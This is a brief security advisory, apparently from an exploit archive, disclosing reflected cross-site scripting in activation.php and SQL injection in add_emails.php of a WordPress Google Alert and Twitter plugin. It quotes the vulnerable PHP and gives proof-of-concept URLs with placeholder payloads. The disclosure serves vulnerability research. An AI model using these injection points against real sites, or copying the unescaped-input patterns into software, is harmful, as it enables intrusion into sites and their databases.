Google Alert And Twitter Plugin v. 3.1.5 XSS Exploit & SQL Injection
vendor url: www.galertplugin.com
Researcher: Dan Fosco
Home: www.dfcode.org
XSS:
<-- Vulnerable Code on activation.php -->
...
$message = '';
if( isset($_GET['msg']) )
{
$message = '<div class="updated"><p>'.$_GET['msg'].'</p></div>';
}
...
<a href="http://galertplugin.com/training.html"><img src="http://galertplugin.com/images/training.jpg" width="197" height="61" alt="training" /></a>
<?php echo $message; ?>
<form action="" method="POST" enctype="form-data">
...
<-- End Vulnerable Code -->
POC: url/wp-content/plugins/googlealertandtwitter/activation.php?msg=">INJECT CODE HERE
SQL Injection:
<-- Vulnerable Code on add_emails.php -->
...
elseif($_REQUEST['action']=='edit')
{
$id = $_REQUEST['EID'];
$action = $_REQUEST['action'];
$query = $wpdb->get_results("SELECT * FROM add_email WHERE `id` = '".$id."'");
...
<-- End Vulnerable Code -->
POC: url/wp-content/plugins/googlealertandtwitter/add_emails.php?action=edit&EID=' SQL INJECTION
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information